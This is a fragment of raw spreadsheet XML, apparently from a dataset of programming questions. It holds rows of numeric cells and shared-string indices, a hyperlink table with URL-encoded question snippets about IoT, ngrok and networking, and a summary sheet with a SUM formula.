        <v>31898.0</v>
      </c>
      <c r="B34250" s="2">
        <v>5.2955382E7</v>
      </c>
      <c r="C34250" s="2" t="s">
        <v>32965</v>
      </c>
      <c r="D34250" s="2">
        <v>1.0</v>
      </c>
      <c r="E34250" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34250" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34251" ht="15.75" customHeight="1">
      <c r="A34251" s="1">
        <v>32061.0</v>
      </c>
      <c r="B34251" s="2">
        <v>5378944.0</v>
      </c>
      <c r="C34251" s="2" t="s">
        <v>32869</v>
      </c>
      <c r="D34251" s="2">
        <v>1.0</v>
      </c>
      <c r="E34251" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34251" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34252" ht="15.75" customHeight="1">
      <c r="A34252" s="1">
        <v>32287.0</v>
      </c>
      <c r="B34252" s="2">
        <v>5542687.0</v>
      </c>
      <c r="C34252" s="2" t="s">
        <v>32966</v>
      </c>
      <c r="D34252" s="2">
        <v>1.0</v>
      </c>
      <c r="E34252" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34252" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34253" ht="15.75" customHeight="1">
      <c r="A34253" s="1">
        <v>32365.0</v>
      </c>
      <c r="B34253" s="2">
        <v>5.5948391E7</v>
      </c>
      <c r="C34253" s="2" t="s">
        <v>32967</v>
      </c>
      <c r="D34253" s="2">
        <v>1.0</v>
      </c>
      <c r="E34253" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34253" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34254" ht="15.75" customHeight="1">
      <c r="A34254" s="1">
        <v>32439.0</v>
      </c>
      <c r="B34254" s="2">
        <v>5659657.0</v>
      </c>
      <c r="C34254" s="2" t="s">
        <v>32968</v>
      </c>
      <c r="D34254" s="2">
        <v>1.0</v>
      </c>
      <c r="E34254" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34254" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34255" ht="15.75" customHeight="1">
      <c r="A34255" s="1">
        <v>32598.0</v>
      </c>
      <c r="B34255" s="2">
        <v>5818464.0</v>
      </c>
      <c r="C34255" s="2" t="s">
        <v>32969</v>
      </c>
      <c r="D34255" s="2">
        <v>1.0</v>
      </c>
      <c r="E34255" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34255" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34256" ht="15.75" customHeight="1">
      <c r="A34256" s="1">
        <v>32620.0</v>
      </c>
      <c r="B34256" s="2">
        <v>5840027.0</v>
      </c>
      <c r="C34256" s="2" t="s">
        <v>32970</v>
      </c>
      <c r="D34256" s="2">
        <v>1.0</v>
      </c>
      <c r="E34256" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34256" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34257" ht="15.75" customHeight="1">
      <c r="A34257" s="1">
        <v>32654.0</v>
      </c>
      <c r="B34257" s="2">
        <v>5892623.0</v>
      </c>
      <c r="C34257" s="2" t="s">
        <v>32971</v>
      </c>
      <c r="D34257" s="2">
        <v>1.0</v>
      </c>
      <c r="E34257" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34257" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34258" ht="15.75" customHeight="1">
      <c r="A34258" s="1">
        <v>32671.0</v>
      </c>
      <c r="B34258" s="2">
        <v>5933304.0</v>
      </c>
      <c r="C34258" s="2" t="s">
        <v>32972</v>
      </c>
      <c r="D34258" s="2">
        <v>1.0</v>
      </c>
      <c r="E34258" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34258" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34259" ht="15.75" customHeight="1">
      <c r="A34259" s="1">
        <v>32774.0</v>
      </c>
      <c r="B34259" s="2">
        <v>6088814.0</v>
      </c>
      <c r="C34259" s="2" t="s">
        <v>32973</v>
      </c>
      <c r="D34259" s="2">
        <v>1.0</v>
      </c>
      <c r="E34259" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34259" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34260" ht="15.75" customHeight="1">
      <c r="A34260" s="1">
        <v>32775.0</v>
      </c>
      <c r="B34260" s="2">
        <v>6088814.0</v>
      </c>
      <c r="C34260" s="2" t="s">
        <v>32974</v>
      </c>
      <c r="D34260" s="2">
        <v>1.0</v>
      </c>
      <c r="E34260" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34260" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34261" ht="15.75" customHeight="1">
      <c r="A34261" s="1">
        <v>32920.0</v>
      </c>
      <c r="B34261" s="2">
        <v>6423393.0</v>
      </c>
      <c r="C34261" s="2" t="s">
        <v>32975</v>
      </c>
      <c r="D34261" s="2">
        <v>1.0</v>
      </c>
      <c r="E34261" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34261" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34262" ht="15.75" customHeight="1">
      <c r="A34262" s="1">
        <v>33171.0</v>
      </c>
      <c r="B34262" s="2">
        <v>7086085.0</v>
      </c>
      <c r="C34262" s="2" t="s">
        <v>32962</v>
      </c>
      <c r="D34262" s="2">
        <v>1.0</v>
      </c>
      <c r="E34262" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34262" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34263" ht="15.75" customHeight="1">
      <c r="A34263" s="1">
        <v>33378.0</v>
      </c>
      <c r="B34263" s="2">
        <v>7643939.0</v>
      </c>
      <c r="C34263" s="2" t="s">
        <v>32976</v>
      </c>
      <c r="D34263" s="2">
        <v>1.0</v>
      </c>
      <c r="E34263" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34263" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34264" ht="15.75" customHeight="1">
      <c r="A34264" s="1">
        <v>33480.0</v>
      </c>
      <c r="B34264" s="2">
        <v>7997292.0</v>
      </c>
      <c r="C34264" s="2" t="s">
        <v>32927</v>
      </c>
      <c r="D34264" s="2">
        <v>1.0</v>
      </c>
      <c r="E34264" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34264" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34265" ht="15.75" customHeight="1">
      <c r="A34265" s="1">
        <v>33561.0</v>
      </c>
      <c r="B34265" s="2">
        <v>8195524.0</v>
      </c>
      <c r="C34265" s="2" t="s">
        <v>32977</v>
      </c>
      <c r="D34265" s="2">
        <v>1.0</v>
      </c>
      <c r="E34265" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34265" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34266" ht="15.75" customHeight="1">
      <c r="A34266" s="1">
        <v>33606.0</v>
      </c>
      <c r="B34266" s="2">
        <v>8341125.0</v>
      </c>
      <c r="C34266" s="2" t="s">
        <v>32978</v>
      </c>
      <c r="D34266" s="2">
        <v>1.0</v>
      </c>
      <c r="E34266" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34266" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34267" ht="15.75" customHeight="1">
      <c r="A34267" s="1">
        <v>33812.0</v>
      </c>
      <c r="B34267" s="2">
        <v>8887270.0</v>
      </c>
      <c r="C34267" s="2" t="s">
        <v>32979</v>
      </c>
      <c r="D34267" s="2">
        <v>1.0</v>
      </c>
      <c r="E34267" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34267" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34268" ht="15.75" customHeight="1">
      <c r="A34268" s="1">
        <v>33860.0</v>
      </c>
      <c r="B34268" s="2">
        <v>9052289.0</v>
      </c>
      <c r="C34268" s="2" t="s">
        <v>32980</v>
      </c>
      <c r="D34268" s="2">
        <v>1.0</v>
      </c>
      <c r="E34268" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34268" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34269" ht="15.75" customHeight="1">
      <c r="A34269" s="1">
        <v>33965.0</v>
      </c>
      <c r="B34269" s="2">
        <v>9349660.0</v>
      </c>
      <c r="C34269" s="2" t="s">
        <v>32981</v>
      </c>
      <c r="D34269" s="2">
        <v>1.0</v>
      </c>
      <c r="E34269" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34269" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34270" ht="15.75" customHeight="1">
      <c r="A34270" s="1">
        <v>34032.0</v>
      </c>
      <c r="B34270" s="2">
        <v>9549901.0</v>
      </c>
      <c r="C34270" s="2" t="s">
        <v>32982</v>
      </c>
      <c r="D34270" s="2">
        <v>1.0</v>
      </c>
      <c r="E34270" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34270" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34271" ht="15.75" customHeight="1">
      <c r="A34271" s="1">
        <v>34080.0</v>
      </c>
      <c r="B34271" s="2">
        <v>9671698.0</v>
      </c>
      <c r="C34271" s="2" t="s">
        <v>32885</v>
      </c>
      <c r="D34271" s="2">
        <v>1.0</v>
      </c>
      <c r="E34271" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34271" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
  </sheetData>
  <hyperlinks>
    <hyperlink r:id="rId1" ref="C18"/>
    <hyperlink r:id="rId2" ref="C763"/>
    <hyperlink r:id="rId3" ref="C1144"/>
    <hyperlink r:id="rId4" ref="C1934"/>
    <hyperlink r:id="rId5" ref="C3403"/>
    <hyperlink r:id="rId6" ref="C3703"/>
    <hyperlink r:id="rId7" ref="C4276"/>
    <hyperlink r:id="rId8" ref="C4773"/>
    <hyperlink r:id="rId9" ref="C7042"/>
    <hyperlink r:id="rId10" ref="C7940"/>
    <hyperlink r:id="rId11" ref="C8002"/>
    <hyperlink r:id="rId12" ref="C8159"/>
    <hyperlink r:id="rId13" ref="C8895"/>
    <hyperlink r:id="rId14" ref="C9136"/>
    <hyperlink r:id="rId15" ref="C9166"/>
    <hyperlink r:id="rId16" ref="C9844"/>
    <hyperlink r:id="rId17" ref="C10273"/>
    <hyperlink r:id="rId18" ref="C10971"/>
    <hyperlink r:id="rId19" ref="C11206"/>
    <hyperlink r:id="rId20" location="L27%20&#10;I%20can%20successfully%20connect%20if%20I%20use%20a%20IAM%20user%20with%20a%20valid%20IoT%20policy,%20but%20if%20I%20use%20the%20user%20credentials,%20I%20receive%20a%20%22101%20Switching%20Protocols%22%20response%20but%20then%20it%20gets%20closed." ref="C11227"/>
    <hyperlink r:id="rId21" ref="C11423"/>
    <hyperlink r:id="rId22" ref="C11449"/>
    <hyperlink r:id="rId23" ref="C11454"/>
    <hyperlink r:id="rId24" ref="C11460"/>
    <hyperlink r:id="rId25" ref="C11465"/>
    <hyperlink r:id="rId26" ref="C11602"/>
    <hyperlink r:id="rId27" ref="C11782"/>
    <hyperlink r:id="rId28" ref="C12002"/>
    <hyperlink r:id="rId29" ref="C12199"/>
    <hyperlink r:id="rId30" ref="C12234"/>
    <hyperlink r:id="rId31" location="authtoken&#10;First,%20go%20to%20ngrok%20website%20and%20login%20with%20an%20account." ref="C12237"/>
    <hyperlink r:id="rId32" ref="C12243"/>
    <hyperlink r:id="rId33" ref="C12322"/>
    <hyperlink r:id="rId34" ref="C12347"/>
    <hyperlink r:id="rId35" ref="C12631"/>
    <hyperlink r:id="rId36" ref="C12720"/>
    <hyperlink r:id="rId37" ref="C12748"/>
    <hyperlink r:id="rId38" location="!/Bulk_Operations/post_bulk_devices_add&#10;Also,%20this%20recipe%20describes%20how%20to%20register%20multiple%20IoT%20devices." ref="C12774"/>
    <hyperlink r:id="rId39" ref="C12785"/>
    <hyperlink r:id="rId40" location="!/Bulk_Operations/post_bulk_devices_add&#10;Also,%20this%20recipe%20describes%20how%20to%20register%20multiple%20IoT%20devices." ref="C12864"/>
    <hyperlink r:id="rId41" ref="C13090"/>
    <hyperlink r:id="rId42" ref="C13331"/>
    <hyperlink r:id="rId43" ref="C13335"/>
    <hyperlink r:id="rId44" ref="C13673"/>
    <hyperlink r:id="rId45" location="links%20(Dart%20Shelf%20and%20unit%20testing)%20%20&#10;https://plus.google.com/+AndersHolmgren1/posts/96jxrWA52db%20(some%20shelf_route%20tips)" ref="C13941"/>
    <hyperlink r:id="rId46" ref="C14009"/>
    <hyperlink r:id="rId47" ref="C15929"/>
    <hyperlink r:id="rId48" ref="C16565"/>
    <hyperlink r:id="rId49" ref="C18809"/>
    <hyperlink r:id="rId50" ref="C19323"/>
    <hyperlink r:id="rId51" ref="C19658"/>
    <hyperlink r:id="rId52" ref="C19659"/>
    <hyperlink r:id="rId53" ref="C19789"/>
    <hyperlink r:id="rId54" ref="C20148"/>
    <hyperlink r:id="rId55" ref="C20251"/>
    <hyperlink r:id="rId56" ref="C20366"/>
    <hyperlink r:id="rId57" ref="C20626"/>
    <hyperlink r:id="rId58" ref="C21213"/>
    <hyperlink r:id="rId59" ref="C21792"/>
    <hyperlink r:id="rId60" location="netsocketon&#10;Also,%20this%20function%20may%20help%20to%20verify%20the%20correctness%20of%20ip." ref="C22456"/>
    <hyperlink r:id="rId61" ref="C22821"/>
    <hyperlink r:id="rId62" ref="C22907"/>
    <hyperlink r:id="rId63" ref="C23182"/>
    <hyperlink r:id="rId64" ref="C23573"/>
    <hyperlink r:id="rId65" ref="C23778"/>
    <hyperlink r:id="rId66" ref="C24631"/>
    <hyperlink r:id="rId67" ref="C24749"/>
    <hyperlink r:id="rId68" ref="C25003"/>
    <hyperlink r:id="rId69" ref="C25043"/>
    <hyperlink r:id="rId70" location="Safari_10" ref="C25299"/>
    <hyperlink r:id="rId71" ref="C25670"/>
    <hyperlink r:id="rId72" ref="C25887"/>
    <hyperlink r:id="rId73" ref="C25971"/>
    <hyperlink r:id="rId74" ref="C25975"/>
    <hyperlink r:id="rId75" ref="C26131"/>
    <hyperlink r:id="rId76" ref="C26133"/>
    <hyperlink r:id="rId77" ref="C26262"/>
    <hyperlink r:id="rId78" location="Links&#10;I%20would%20like%20to%20make%20the%20device%20so%20that%20as%20soon%20as%20it%20is%20inserted%20and%20installed%20it%20sends%20a%20password%20followed%20by%20the%20enter%20key." ref="C26297"/>
    <hyperlink r:id="rId79" ref="C27534"/>
    <hyperlink r:id="rId80" location="HamachiforLinux&#10;I%20haven't%20added%20any%20new%20system%20in%20a%20while%20but%20here%20were%20the%20commands%20I%20typed." ref="C29124"/>
    <hyperlink r:id="rId81" ref="C29373"/>
    <hyperlink r:id="rId82" ref="C29878"/>
    <hyperlink r:id="rId83" ref="C31780"/>
    <hyperlink r:id="rId84" ref="C31832"/>
    <hyperlink r:id="rId85" ref="C32435"/>
    <hyperlink r:id="rId86" ref="C32537"/>
    <hyperlink r:id="rId87" ref="C33028"/>
    <hyperlink r:id="rId88" ref="C33404"/>
    <hyperlink r:id="rId89" ref="C33467"/>
    <hyperlink r:id="rId90" ref="C34003"/>
    <hyperlink r:id="rId91" ref="C34166"/>
    <hyperlink r:id="rId92" ref="C34198"/>
    <hyperlink r:id="rId93" ref="C34203"/>
    <hyperlink r:id="rId94" location="TLS_1.2" ref="C34215"/>
    <hyperlink r:id="rId95" ref="C34217"/>
    <hyperlink r:id="rId96" ref="C34241"/>
  </hyperlinks>
  <printOptions/>
  <pageMargins bottom="0.75" footer="0.0" header="0.0" left="0.7" right="0.7" top="0.75"/>
  <pageSetup orientation="landscape"/>
  <drawing r:id="rId9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32983</v>
      </c>
      <c r="B1" s="8" t="s">
        <v>28514</v>
      </c>
      <c r="D1" s="2" t="s">
        <v>32984</v>
      </c>
      <c r="E1" s="9">
        <v>4608.0</v>
      </c>
    </row>
    <row r="2">
      <c r="A2" s="7" t="s">
        <v>32985</v>
      </c>
      <c r="B2" s="7" t="s">
        <v>18833</v>
      </c>
      <c r="D2" s="2" t="s">
        <v>32984</v>
      </c>
      <c r="E2" s="9">
        <v>3431.0</v>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="7" t="s">
        <v>32986</v>
      </c>
      <c r="B3" s="10" t="s">
        <v>15755</v>
      </c>
      <c r="D3" s="2" t="s">
        <v>32984</v>
      </c>
      <c r="E3" s="9">
        <v>3217.0</v>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="7" t="s">
        <v>32987</v>
      </c>
      <c r="B4" s="7" t="s">
        <v>13387</v>
      </c>
      <c r="D4" s="2" t="s">
        <v>32988</v>
      </c>
      <c r="E4" s="9">
        <v>2418.0</v>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="7" t="s">
        <v>32989</v>
      </c>
      <c r="B5" s="11" t="s">
        <v>10480</v>
      </c>
      <c r="D5" s="2" t="s">
        <v>32988</v>
      </c>
      <c r="E5" s="9">
        <v>2970.0</v>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="7" t="s">
        <v>32990</v>
      </c>
      <c r="B6" s="7" t="s">
        <v>7374</v>
      </c>
      <c r="D6" s="2" t="s">
        <v>32988</v>
      </c>
      <c r="E6" s="9">
        <v>3171.0</v>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="7" t="s">
        <v>32991</v>
      </c>
      <c r="B7" s="10" t="s">
        <v>4878</v>
      </c>
      <c r="D7" s="2" t="s">
        <v>32984</v>
      </c>
      <c r="E7" s="9">
        <v>2673.0</v>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="7" t="s">
        <v>32992</v>
      </c>
      <c r="B8" s="10" t="s">
        <v>2353</v>
      </c>
      <c r="D8" s="2" t="s">
        <v>32993</v>
      </c>
      <c r="E8" s="9">
        <v>2554.0</v>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="7" t="s">
        <v>32994</v>
      </c>
      <c r="B9" s="7" t="s">
        <v>6</v>
      </c>
      <c r="D9" s="2" t="s">
        <v>32984</v>
      </c>
      <c r="E9" s="9">
        <v>2538.0</v>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="7" t="s">
        <v>32995</v>
      </c>
      <c r="B10" s="10" t="s">
        <v>26559</v>
      </c>
      <c r="D10" s="2" t="s">
        <v>32984</v>
      </c>
      <c r="E10" s="9">
        <v>2031.0</v>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="7" t="s">
        <v>32996</v>
      </c>
      <c r="B11" s="7" t="s">
        <v>24318</v>
      </c>
      <c r="D11" s="2" t="s">
        <v>32984</v>
      </c>
      <c r="E11" s="9">
        <v>2357.0</v>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="7" t="s">
        <v>32997</v>
      </c>
      <c r="B12" s="10" t="s">
        <v>22188</v>
      </c>
      <c r="D12" s="2" t="s">
        <v>32984</v>
      </c>
      <c r="E12" s="9">
        <v>2302.0</v>
      </c>
    </row>
    <row r="13">
      <c r="E13" s="2">
        <f>sum(E1:E12)</f>
        <v>34270</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2021-03-27T08:03:25Z</dcterms:created>
</cp:coreProperties>
</file>